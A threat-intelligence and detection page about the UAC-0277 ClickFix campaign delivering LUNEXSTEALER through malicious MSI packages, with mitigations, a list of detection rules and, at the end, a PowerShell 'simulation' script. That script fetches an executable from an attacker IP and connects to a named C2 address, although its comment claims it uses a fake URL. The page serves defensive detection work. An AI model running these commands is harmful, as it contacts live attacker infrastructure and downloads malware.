SOC Prime Bias: High

06 Oct 2026 14:30 UTC

UAC-0277 Attacks Deliver LUNEXSTEALER via Malicious MSI and ClickFix

Author Photo
SOC Prime Team linkedin icon Follow
UAC-0277 Attacks Deliver LUNEXSTEALER via Malicious MSI and ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Threat actors tracked as UAC-0277 are compromising legitimate websites to inject malicious JavaScript that lures users into executing commands through a fake Cloudflare verification page. This ClickFix technique ultimately delivers MSI packages containing LUNEXSTEALER or additional loaders that leverage BYOVD to evade security controls. The campaign also uses blockchain-based command-and-control infrastructure on Polygon and Ethereum to dynamically manage attacker resources.

Investigation

CERT-UA identified more than 100 compromised websites and analyzed three MSI variants associated with the campaign. Researchers observed DLL side-loading involving FnHotkeyUtility.exe and exploitation of the vulnerable AMD PDFWKRNL.sys driver to bypass Windows Defender protections. The investigation also uncovered the LUNARAXE browser extension and the NAIVEMESS PowerShell component used to collect and exfiltrate data.

Mitigation

Administrators should restrict access to the Run dialog (Win+R) through Group Policy and limit MSI installation privileges to authorized users. Enabling the Microsoft Vulnerable Driver Blocklist is essential for reducing the risk of BYOVD attacks. Organizations should also enforce browser extension allowlists and monitor suspicious msiexec.exe command-line activity involving remote URLs.

Response

When suspicious MSI execution or unauthorized browser extensions are detected, isolate the affected host and terminate processes associated with LUNEXSTEALER. Review scheduled tasks for entries named psychedelicloveUtils and inspect browser profiles for the Microsoft Office Word Editor extension. Any identified fake Cloudflare verification pages associated with the campaign should be reported to CERT-UA.

Attack Flow

Detections

Suspicious RunMRU Entry With LOLBin Semantics (via registry_event)

SOC Prime Team
05 Oct 2026

Possible Remote MSI File Installation Attempt (via cmdline)

SOC Prime Team
05 Oct 2026

Suspicious Scheduled Task (via audit)

SOC Prime Team
05 Oct 2026

Suspicious File Download Direct IP (via proxy)

SOC Prime Team
05 Oct 2026

Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)

SOC Prime Team
05 Oct 2026

IOCs (HashSha256) to detect: UAC-0277 Campaign: Malicious MSI Deployment via ClickFix Technique and LUNEXSTEALER Malware Part 2

SOC Prime AI Rules
06 Oct 2026

IOCs (HashSha256) to detect: UAC-0277 Campaign: Malicious MSI Deployment via ClickFix Technique and LUNEXSTEALER Malware Part 1

SOC Prime AI Rules
06 Oct 2026

IOCs (HashMd5) to detect: UAC-0277 Campaign: Malicious MSI Deployment via ClickFix Technique and LUNEXSTEALER Malware Part 2

SOC Prime AI Rules
06 Oct 2026

IOCs (HashMd5) to detect: UAC-0277 Campaign: Malicious MSI Deployment via ClickFix Technique and LUNEXSTEALER Malware Part 1

SOC Prime AI Rules
06 Oct 2026

IOCs (SourceIP) to detect: UAC-0277 Campaign: Malicious MSI Deployment via ClickFix Technique and LUNEXSTEALER Malware

SOC Prime AI Rules
06 Oct 2026

IOCs (DestinationIP) to detect: UAC-0277 Campaign: Malicious MSI Deployment via ClickFix Technique and LUNEXSTEALER Malware

SOC Prime AI Rules
06 Oct 2026

Detect Interaction with Malicious C2 Servers Using HTTP and WebSocket [Windows Network Connection]

SOC Prime AI Rules
06 Oct 2026

FnHotkeyUtility Executing Malicious spkvol.dll via DLL Side-Loading [Windows Sysmon]

SOC Prime AI Rules
06 Oct 2026

Malicious MSI Package Download using Msiexec and Vulnerability Exploitation [Windows Process Creation]

SOC Prime AI Rules
06 Oct 2026

Detect Malicious JavaScript on Compromised Websites [Webserver]

SOC Prime AI Rules
06 Oct 2026

Simulation Execution

  • Attack Narrative & Commands: The adversary has successfully performed a drive-by compromise. To establish persistence and download the next-stage malware, the implanted agent attempts to fetch a file named psychedeliclove.exe from a specific URI. Simultaneously, the agent attempts to beacon out to a secondary C2 node located at 193.178.159.128 on port 8080 to receive instructions via a WebSocket-like HTTP connection. These specific indicators are intended to trigger the existing proxy-based detection rules.

  • Regression Test Script:

    # Simulation Script for Detection Validation
    # Purpose: Trigger the specific URL and IP/Port indicators in the detection rule.
    
    Write-Host "[*] Starting Simulation..." -ForegroundColor Cyan
    
    # 1. Trigger Selection 1: Malicious URL Pattern
    Write-Host "[*] Attempting to access malicious URL pattern..." -ForegroundColor Yellow
    try {
        # We use a non-existent local listener or a fake URL to ensure we don't actually hit a real malicious site, 
        # but the proxy should still log the request attempt.
        Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue
    } catch {
        Write-Host "[!] Request failed (expected), but telemetry should be generated." -ForegroundColor Gray
    }
    
    # 2. Trigger Selection 2: Specific IP and Port
    Write-Host "[*] Attempting to connect to C2 IP on port 8080..." -ForegroundColor Yellow
    try {
        $client = New-Object System.Net.Sockets.TcpClient
        $client.Connect("193.178.159.128", 8080)
        $client.Close()
    } catch {
        Write-Host "[!] Connection failed (expected), but proxy logs should capture the attempt." -ForegroundColor Gray
    }
    
    Write-Host "[*] Simulation Complete." -ForegroundColor Cyan
  • Cleanup Commands:

    # No persistent files are created by this simulation.
    # Only temporary network connections are attempted.
    Write-Host "[*] Cleanup complete. No artifacts left on system." -ForegroundColor Green